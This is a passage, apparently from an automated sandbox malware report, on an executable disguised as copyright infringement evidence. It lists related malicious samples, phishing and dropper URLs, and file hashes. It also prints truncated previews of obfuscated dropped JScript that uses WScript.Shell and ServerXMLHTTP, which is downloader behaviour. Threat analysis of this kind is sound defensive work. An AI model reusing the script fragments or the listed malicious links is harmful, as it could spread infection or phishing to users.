sNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secuGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.65.229
                                                                                                        https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzA1Mzk4LCJuYmYiOjE3MjgzMDUzOTgsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJpeHI5d3pqeGcwZnI2NGJjbGwycyIsInRva2VuIjoiaXhyOXd6anhnMGZyNjRiY2xsMnMiLCJzZW5kX2F0IjoxNzI4MzA0MzU0LCJlbWFpbF9pZCI6OTk2Mzg3MCwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTM4MjUsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj1TcHJpbmcraGFzK3NwcnVuZyslRjAlOUYlOEMlQjEifQ.HIDfaWGNVn-TCtUT4qZNHq7EdymoLEqvVA8XxZBU8z8Get hashmaliciousHtmlDropperBrowse
                                                                                                        • 151.101.194.137
                                                                                                        FW_ _EXTERNAL_ Completed_ iNH9Y_Contract_and_Agreement_3509750318S REF ID_iNH9Y.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://entertaininmotionre.pro/IQCm/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.66.137
                                                                                                        http://kendellseafoods.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdMGet hashmaliciousHtmlDropperBrowse
                                                                                                        • 151.101.194.137
                                                                                                        AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        Copyright_Infringement_Evidence.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 96.17.64.189
                                                                                                        SecuriteInfo.com.Trojan.DownLoader47.43340.9153.30810.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        SecuriteInfo.com.Win32.Evo-gen.11282.4102.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        9Y6R8fs0wd.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        PFW1cgN8EK.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        No context
                                                                                                        No context
                                                                                                        Process:C:\Users\user\Desktop\copyright_infringement_evidence_1.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3320
                                                                                                        Entropy (8bit):3.663244993632923
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:4OG+OOG8OGRPfkuhStRtxh8Hwtj4HuIiK4t+y:j3Bm8vQmH04Hfij
                                                                                                        MD5:FB0E7423E19E9B9AD636E577CDF000AB
                                                                                                        SHA1:E074430B6FD757101C364A9F29C9F9C31155A8F2
                                                                                                        SHA-256:83F29A1621438FB9213B9117D27F90F9ADF895551FD6C2637C5802E3E4982D49
                                                                                                        SHA-512:0958A2C1704B70702803EE38615D6E571C24D47DA0B287B89632CDFB94D114534E4559D405FE79EB2F1DA62E0C9A8A3A80D1ED18AFBA03184C6DBD0C287AE933
                                                                                                        Malicious:true
                                                                                                        Preview:.. . . . . . . . .v.a.r. .a.d.u.b.a.m.e.n.t.o. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".).;..... . . . . . . . .v.a.r. .f.u.r.i.f.o.l.h.a. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".).;..... . . . . . . . .v.a.r. .b.u.d.o.a.r. .=. .f.u.r.i.f.o.l.h.a...E.x.p.a.n.d.E.n.v.i.r.o.n.m.e.n.t.S.t.r.i.n.g.s.(.".%.A.P.P.D.A.T.A.%.".).;..... . . . . . . . .v.a.r. .h.o.s.t.e. .=. .f.u.r.i.f.o.l.h.a...E.x.p.a.n.d.E.n.v.i.r.o.n.m.e.n.t.S.t.r.i.n.g.s.(.".%.U.S.E.R.P.R.O.F.I.L.E.%.".).;..... . . . . . . . .v.a.r. .e.l.e.c.t.r.i.z.a.r. .=. .f.u.r.i.f.o.l.h.a...E.x.p.a.n.d.E.n.v.i.r.o.n.m.e.n.t.S.t.r.i.n.g.s.(.".%.T.E.M.P.%.".).;..... . . . . . . . .v.a.r. .m.e.n.c.i.o.n.a.r. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P...6...0.".).;..... . . . . . . . .v.a.r. .b.r.i.z.o.m.a.n.t.i.c.o. .=. .h.y.l.e.s.i.n.o.(."..% ..# .. ..3 ..&".).;..... . . . . . . . .v.a.r. .q.u.e.b.r.a.d.o. .=. .
                                                                                                        Process:C:\Users\user\Desktop\copyright_infringement_evidence_1.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3346
                                                                                                        Entropy (8bit):3.544995346037922
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:jzjv7G+jG8GtJzlZ26LR8liJlp0lWHvHLuYim52fK:L73jlEtb26COz0oHvHjiY
                                                                                                        MD5:2AB1E706A3A9EC6BEAE89F1D2E3EFDC4
                                                                                                        SHA1:23AE80738C32702DE9F389843C3DD86AD55A1A65
                                                                                                        SHA-256:603210328276F46BD63203124164E210FDCE27359E003FB3CEA410CB944EB4FF
                                                                                                        SHA-512:9C61DE18489E5B9E88780537902CB73D2D222030F250CA40C5176C018ADEF1AEAEBC56F042B1A52B93050A36674A34B6F8BCA4BC037EE3D45530C056AAA5E4EE
                                                                                                        Malicious:true
                                                                                                        Preview:.. . . . . . . . .v.a.r. .c.h.a.n.t.o.e.i.r.a. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".).;..... . . . . . . . .v.a.r. .o.l.i.g.i.s.t.o. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".).;..... . . . . . . . .v.a.r. .m.o.c.o.c.o.n.a. .=. .o.l.i.g.i.s.t.o...E.x.p.a.n.d.E.n.v.i.r.o.n.m.e.n.t.S.t.r.i.n.g.s.(.".%.A.P.P.D.A.T.A.%.".).;..... . . . . . . . .v.a.r. .a.f.e.r.r.e.t.o.a.r. .=. .o.l.i.g.i.s.t.o...E.x.p.a.n.d.E.n.v.i.r.o.n.m.e.n.t.S.t.r.i.n.g.s.(.".%.U.S.E.R.P.R.O.F.I.L.E.%.".).;..... . . . . . . . .v.a.r. .s.e.t.i.a. .=. .o.l.i.g.i.s.t.o...E.x.p.a.n.d.E.n.v.i.r.o.n.m.e.n.t.S.t.r.i.n.g.s.(.".%.T.E.M.P.%.".).;..... . . . . . . . .v.a.r. .a.c.e.f.a.l.i.t.a.s. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P...6...0.".).;..... . . . . . . . .v.a.r. .t.e.o.r.i.s.t.a. .=. .v.a.s.s.o.i.r.a.r.(.".s" ..2 .." .J( ."+".).;..... . . . . . . . .v.a.r. .m.a.r.g.a.l.h.u.d.o. .=. .v.a.
                                                                                                        Process:C:\Users\user\Desktop\copyright_infringement_evidence_1.exe
                                                                                                        File Type:PDF document, version 1.7, 3 pages
                                                                                                        Category:dropped
                                                                                                        Size (bytes):97532
                                                                                                        Entropy (8bit):7.886048649034749
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:fDn3bJ509immiqoARL//vfFFZTRNYkuUiTn2Kl8lW3jG8krqzFio3hRJBm0GIgwP:rnF5KimNAhfFTRzxlQkoiMhHA0Gm
                                                                                                        MD5:0A38B2745EE17418757B89ED83BF67E9
                                                                                                        SHA1:5E48606D911B66288A4635B804B23096B4153BBE
                                                                                                        SHA-256:00F9505695F17F040C9464E7B62C1EAA7E6B08E64DB30A715E0826547B953730
                                                                                                        SHA-512:4B25823C795776EAA3CE488D71B39FD671D0D58EE3C942201DED7D8FD5076635C6EB96AC1A8F67E342914CB39F69444ADEAE1427DC5C62D29AFC57EA97513766
                                                                                                        Malicious:false
                                                                                                        Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 29 0 R/MarkInfo<</Marked true>>/Metadata 123 0 R/ViewerPreferences 124 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 3/Kids[ 3 0 R 19 0 R 26 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2551>>..stream..x..[[o...~7..0.}....."...9E...i....MR..).......33K.D..q.D.%j...7.,...._}~....7o...{....-l./q\.!..(q.-......w7.g....~q3??s.&...\[..D./........,........_....`.'.|:?.......>|~.........%....|V.........."..i....Q.wT..".].V..eU.{.Z..=k]......#..(.v4..S^.N...I(.. ..w....y:..]..t..-.A.3..ZrT....g...rM.Z...+PK......@op...|.i.w....h.//.e..m.:Z.K0.u.9t.fL.8<...<6..J66t].eQg....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):291
                                                                                                        Entropy (8bit):5.13971575105969
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:sVqYQyq2P92nKuAl9OmbnIFUt8NV+G1Zmw+NV+QRkwO92nKuAl9OmbjLJ:qv4HAahFUt8Z1/+J5LHAaSJ
                                                                                                        MD5:D37E77FFFBEA4BA0D974A5F1E2EDD9FD
                                                                                                        SHA1:6EBD29F3577975C67B3198351CB11080D485F85F
                                                                                                        SHA-256:4ED75499ACAD22FCB435128CEB45CFD5D273C8F42E80220CCC07E6B0A8E8CB2E
                                                                                                        SHA-512:8C69CB7853F9B51BC91D3569D9415BCCBBA3B0303AFDF469175C24A1DF5A75CE5178218B445BBC728E6199E3ADFFBC92A5F2CC45CBE9C65D53131EB4A25C918A
                                                                                                        Malicious:false
                                                                                                        Preview:2024/10/07-20:15:03.131 b70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/07-20:15:03.134 b70 Recovering log #3.2024/10/07-20:15:03.134 b70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):291
                                                                                                        Entropy (8bit):5.13971575105969
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:sVqYQyq2P92nKuAl9OmbnIFUt8NV+G1Zmw+NV+QRkwO92nKuAl9OmbjLJ:qv4HAahFUt8Z1/+J5LHAaSJ
                                                                                                        MD5:D37E77FFFBEA4BA0D974A5F1E2EDD9FD
                                                                                                        SHA1:6EBD29F3577975C67B3198351CB11080D485F85F
                                                                                                        SHA-256:4ED75499ACAD22FCB435128CEB45CFD5D273C8F42E80220CCC07E6B0A8E8CB2E
                                                                                                        SHA-512:8C69CB7853F9B51BC91D3569D9415BCCBBA3B0303AFDF469175C24A1DF5A75CE5178218B445BBC728E6199E3ADFFBC92A5F2CC45CBE9C65D53131EB4A25C918A
                                                                                                        Malicious:false
                                                                                                        Preview:2024/10/07-20:15:03.131 b70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/07-20:15:03.134 b70 Recovering log #3.2024/10/07-20:15:03.134 b70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):335
                                                                                                        Entropy (8bit):5.186753029187265
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:sViF0Mq2P92nKuAl9Ombzo2jMGIFUt8NVsFEZmw+NVsFkkwO92nKuAl9Ombzo2jz:nF5v4HAa8uFUt8J/+D5LHAa8RJ
                                                                                                        MD5:ED2F59D8430C170A2FE24420FC8DA201
                                                                                                        SHA1:8DEFC448C6EE23C539D9293A623D2FF398FFCC29
                                                                                                        SHA-256:10F797ED3C2B8F3AA5537B23C921DE7E783E6107E6ED7B47A3AC31B31A69D616
                                                                                                        SHA-512:D734B1175213C5656677379D43271246065F8624B7BB9A9B142319FB2D8994787742CF95E35ED42B166CBF831556EC07AFDD6E3F1BABCBFCF92D8774A852F7C1
                                                                                                        Malicious:false
                                                                                                        Preview:2024/10/07-20:15:03.187 7b4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/07-20:15:03.189 7b4 Recovering log #3.2024/10/07-20:15:03.189 7b4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):335
                                                                                                        Entropy (8bit):5.186753029187265
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:sViF0Mq2P92nKuAl9Ombzo2jMGIFUt8NVsFEZmw+NVsFkkwO92nKuAl9Ombzo2jz:nF5v4HAa8uFUt8J/+D5LHAa8RJ
                                                                                                        MD5:ED2F59D8430C170A2FE24420FC8DA201
                                                                                                        SHA1:8DEFC448C6EE23C539D9293A623D2FF398FFCC29
                                                                                                        SHA-256:10F797ED3C2B8F3AA5537B23C921DE7E783E6107E6ED7B47A3AC31B31A69D616
                                                                                                        SHA-512:D734B1175213C5656677379D43271246065F8624B7BB9A9B142319FB2D8994787742CF95E35ED42B166CBF831556EC07AFDD6E3F1BABCBFCF92D8774A852F7C1
                                                                                                        Malicious:false
                                                                                                        Preview:2024/10/07-20:15:03.187 7b4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/07-20:15:03.189 7b4 Recovering log #3.2024/10/07-20:15:03.189 7b4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):508
                                                                                                        Entropy (8bit):5.061927262931336
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/um3RA8sqXosBdOg2Hkzcaq3QYiubxnP7E4T3OF+:Y2sRdsQ9dMHl3QYhbxP7nbI+
                                                                                                        MD5:03437D21F6CEB5DD01A397E2ED73940B
                                                                                                        SHA1:E1586C7C9808D513FBAAA74A7A7A077051A5DA6B
                                                                                                        SHA-256:03582A93000C541CC39DC23DD5C0CA7473222F56F3508E74148461F033B4F172
                                                                                                        SHA-512:04C538009CDF42BE1924AA9DBD5BBD4CC2AE238E58C34287EE6326C4374BEB1E0ED1FCB663039D6CCA6F6267E97021C442808CEEFE1E01005372D458943F2501
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372906515780621","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":124146},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:modified
                                                                                                        Size (bytes):508
                                                                                                        Entropy (8bit):5.061927262931336
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/um3RA8sqXosBdOg2Hkzcaq3QYiubxnP7E4T3OF+:Y2sRdsQ9dMHl3QYhbxP7nbI+
                                                                                                        MD5:03437D21F6CEB5DD01A397E2ED73940B
                                                                                                        SHA1:E1586C7C9808D513FBAAA74A7A7A077051A5DA6B
                                                                                                        SHA-256:03582A93000C541CC39DC23DD5C0CA7473222F56F3508E74148461F033B4F172
                                                                                                        SHA-512:04C538009CDF42BE1924AA9DBD5BBD4CC2AE238E58C34287EE6326C4374BEB1E0ED1FCB663039D6CCA6F6267E97021C442808CEEFE1E01005372D458943F2501
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372906515780621","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":124146},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4099
                                                                                                        Entropy (8bit):5.2359116315097465
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUFp7ElUP:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNL8
                                                                                                        MD5:04A7F335A9F22BFB60C1914E52CB5DD3
                                                                                                        SHA1:EE7CE204756B5A65FCD9B2AE08E7B242668BAD20
                                                                                                        SHA-256:B3CE62F97EA4F9BC67791DC9BFE2B01338C69E9ADC93867A466427E11052E713
                                                                                                        SHA-512:04D5ACB7DF125897962C62E037F15F3BA300AB7971518C8DD344E1D9F0BECD08E974F17349AF6E00A51D87479C95CE9D7D177E35E5A6C06FB44B3B8312AD3C5F
                                                                                                        Malicious:false
                                                                                                        Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):323
                                                                                                        Entropy (8bit):5.184925385001971
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:sVaq2P92nKuAl9OmbzNMxIFUt8NVmZmw+NV3zkwO92nKuAl9OmbzNMFLJ:bv4HAa8jFUt8G/+D5LHAa84J
                                                                                                        MD5:00DE2640F28FABFABF22D2CF53A01B04
                                                                                                        SHA1:644193F8DA27B13770C03EE0C5F5374DD17E495B
                                                                                                        SHA-256:8640DED3B9E93BDFEA6F2178F592C2E8285BB61A3480DBC7FCBECD0C99BAA7D2
                                                                                                        SHA-512:C00CB4AB885008F66D2B97A245803F7F28A3C1A4C5E594779A4AF200B31A2E21B6B1342F28BFAAD6B707A0E959E4DAD6F6AF0C67FD25983EE9BCD9D2A39D992C
                                                                                                        Malicious:false
                                                                                                        Preview:2024/10/07-20:15:03.756 7b4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/07-20:15:03.757 7b4 Recovering log #3.2024/10/07-20:15:03.758 7b4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):323
                                                                                                        Entropy (8bit):5.184925385001971
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:sVaq2P92nKuAl9OmbzNMxIFUt8NVmZmw+NV3zkwO92nKuAl9OmbzNMFLJ:bv4HAa8jFUt8G/+D5LHAa84J
                                                                                                        MD5:00DE2640F28FABFABF22D2CF53A01B04
                                                                                                        SHA1:644193F8DA27B13770C03EE0C5F5374DD17E495B
                                                                                                        SHA-256:8640DED3B9E93BDFEA6F2178F592C2E8285BB61A3480DBC7FCBECD0C99BAA7D2
                                                                                                        SHA-512:C00CB4AB885008F66D2B97A245803F7F28A3C1A4C5E594779A4AF200B31A2E21B6B1342F28BFAAD6B707A0E959E4DAD6F6AF0C67FD25983EE9BCD9D2A39D992C
                                                                                                        Malicious:false
                                                                                                        Preview:2024/10/07-20:15:03.756 7b4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/07-20:15:03.757 7b4 Recovering log #3.2024/10/07-20:15:03.758 7b4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                                        Category:dropped
                                                                                                        Size (bytes):71190
                                                                                                        Entropy (8bit):1.6763841070201972
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:TPWtS8BGRatsqGZqSVbyHD7tUXCpYRg4ugIMMM9fuPeCq190MMMpMMAwvRMMMjMb:TuQumaro+H9V5SzZ6FEJF+hRHI9n
                                                                                                        MD5:3A0023F16CA78BA46DB87412D47041DF
                                                                                                        SHA1:C877F22D96EE3301A4A152C4E25E00ECFC33C66F
                                                                                                        SHA-256:E7C8D851281750F9230E3CF0AA4215569B56F3D0BAC1A1050A9780FCEBB07A17
                                                                                                        SHA-512:19E580DADAEE53D55B087E96BDF023752F4A497B11646694E0F631D5EBFF3D5787B8E909F05FEEA15FC920C38A3C5E3A236B340C12F9B33958A3F1D599B55269
                                                                                                        Malicious:false
                                                                                                        Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 4, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 4
                                                                                                        Category:dropped
                                                                                                        Size (bytes):57344
                                                                                                        Entropy (8bit):3.293508847580663
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:PedRBpVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:Pevci5H5FY+EUUUTTcHqFzqFP
                                                                                                        MD5:20DD9DCCEF0FC4C1153F789E018C473D
                                                                                                        SHA1:6E64365D3F63254D5D55AF35F7CAF35EB6DF5022
                                                                                                        SHA-256:BAE8B4FEEBCDCBFDAB3AE67B76A53034CF742CA5DBF0F6A6238FFBCAA9535E57
                                                                                                        SHA-512:159B7DFF92FCB359A64DDA50DA19DD69838CB4106700E28002FAD628CEA1D3093E3AB31B2D0ECA3F7102C63C5F17D792410A89A937CE16F8D434DB353DD4823F
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8720
                                                                                                        Entropy (8bit):2.2118783694476316
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:7+tqRs8wKeqLKzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9M4:7M7keqOmFTIF3XmHjBoGGR+jMz+Lht
                                                                                                        MD5:5F209591602246F0C33DA546DF7F6462
                                                                                                        SHA1:B69005F505E13260382481EF8D4B781E7416A7F3
                                                                                                        SHA-256:3454AB8A7F6C88ED638D99C250EB324EF30FC917E01FD98AF1E6E206AC82E225
                                                                                                        SHA-512:BD423615E17765106B1A68D4DCB924BD3DF99DBAC38DBFAE8396330F9D453F58290B9160CCA111E065775DCD0D47316FDDB9D0094C101E8CF9F211759AC7CDE6
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c........c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:Certificate, Version=3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1391
                                                                                                        Entropy (8bit):7.705940075877404
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
